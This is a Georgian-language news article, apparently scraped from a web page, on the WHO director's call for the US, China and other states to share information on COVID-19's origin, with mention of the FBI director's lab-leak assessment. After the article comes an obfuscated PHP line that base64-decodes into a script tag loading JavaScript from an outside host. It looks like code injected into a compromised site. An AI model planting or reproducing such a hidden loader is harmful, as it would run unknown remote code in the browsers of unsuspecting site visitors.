celsiusi
ავერსი შნაიდერი
ჯანდაცვის მსოფლიო ორგანიზაციის დირექტორი აშშ-ს მოუწოდებს, გადასცენ ორგანიზაციას „კოვიდ-19“-ის ლაბორატორიული წარმოშობის დამამტკიცებელი ინფორმაცია.
ტედროს გებრეიესუსმა ასევე მიმართა ჯანდაცვის მსოფლიო ორგანიზაციის ყველა წევრ სახელმწიფოს, გაასაჯაროვონ „კოვიდ-19“-ის წარმოშობის შესახებ მათ ხელთ არსებული ყველა ინფორმაცია.
„რომელიმე ქვეყანას თუ აქვს ინფორმაცია პანდემიის წარმოშობის წყაროს შესახებ, მნიშვნელოვანი და გადამწყვეტია, რომ ეს ინფორმაცია გაუზიარონ ჯანდაცვის მსოფლიო ორგანიზაციას და საერთაშორისო სამეცნიერო საზოგადოებას“, – განაცხადა გებრეიესუსმა.
როგორც ჯანდაცვის მსოფლიო ორგანიზაციის დირექტორი ამბობს, „კოვიდ-19“-ის წარმოშობის წყაროს ცოდნა დაეხმარება მსოფლიოს მომავალი პანდემიების პრევენციასა და მართვაში.
მისივე განცხადებით, პანდემიის წარმოშობის წყაროს გარშემო მიმდინარე დისკუსიის პოლიტიზება მეცნიერების სამუშაოს ართულებს და მსოფლიოს უფრო დაუცველს ხდის.
მან ასევე მოუწოდა ჩინეთს, მაქსიმალურად გამჭვირვალე გახადოს ყველა მონაცემი, რომელიც „კოვიდ-19“-ის პანდემიას უკავშირდება და ჩაატაროს სათანადო გამოძიება.
„ვიდრე ეს არ მომხდარა, ყველა ჰიპოთეზა „კოვიდ-19“-ის წარმოშობის შესახებ კვლავაც განიხილება“, – განაცხადა გებრეიესუსმა.
მანამდე აშშ-ის ფედერალური საგამოძიებო ბიუროს დირექტორმა, კრისტოფერ ვრეიმ „ფოქს ნიუსთან“ ინტერვიუში განაცხადა, რომ ამჟამად მათ ხელთ არსებულ ინფორმაციაზე დაყრდნობით, ფედერალური საგამოძიებო ბიურო „კოვიდ-19“-ის წარმოშობის ყველაზე რეალურ ვერსიად ჩინეთის ქალაქ უხანში მდებარე ლაბორატორიაში მომხდარ ინციდენტს განიხილავს.
403
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");